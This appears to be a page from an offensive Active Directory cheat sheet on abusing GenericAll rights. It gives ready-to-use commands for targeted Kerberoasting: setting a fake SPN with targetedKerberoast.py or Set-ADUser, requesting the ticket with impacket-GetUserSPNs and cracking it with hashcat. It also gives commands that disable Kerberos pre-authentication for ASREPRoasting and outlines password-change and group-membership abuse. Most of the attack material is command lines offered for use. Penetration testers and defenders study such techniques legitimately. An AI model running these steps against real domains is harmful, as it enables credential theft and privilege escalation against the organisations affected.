GenericAll
Over a User
Targeted Kerberoasting
targetedKerberoast extracts Kerberoast hashes by abusing write access to set temporary SPNs on users without one, then removes them. It works on all users, a list, or a single user:
targetedKerberoast.py -v -d '<domain>' -u '<user>' -p '<pass>' --request-user '<target-account>'When a group/user has GenericAll rights over another account, a fake SPN can be assigned to the target account:
# Credentialed object for the currently owned user
> $SecPass = ConvertTo-SecureString "<password>" -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", $SecPass)
# Create a fake SPN for the target user
> Set-ADUser -Identity "<target-user>" -Credential $Cred -Add @{ServicePrincipalName='fake/http'}Once the SPN is assigned to the target account, we can Kerberoast it and crack its hash:
# Kerberoast the target account
impacket-GetUserSPNs <domain>\<username>:<password> -request-user <target-user> -dc-ip <dc-ip>
# Crack the hash
hashcat -m13100 fake_spn_hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceTargeted ASREPRoasting
We can disable pre-authentication for the target account and then ASREPRoast it:
# Set the preauth option to true
Set-DomainObject -Identity <USER> -XOR @{UserAccountControl=4194304}# Set the preauth option to true
Get-ADUser <USER> | Set-ADAccountControl -doesnotrequirepreauth $true
# Confirm that it worked
Get-ADUSer -Filter 'DoesNotRequirePreAuth -eq $true'An example of the above method can be found here.
Change user's password
See here.
Over a Group
Add User to the Group
This can be done using native commands, the AD PS module, or PowerView.
Over an OU
If a group has GenericAll rights over an OU, then the group members can be assigned GenericAll rights over the OU as well, which results in them having FullControl over the OU members. This gives the ability to change any OU user's password.
Last updated
Was this helpful?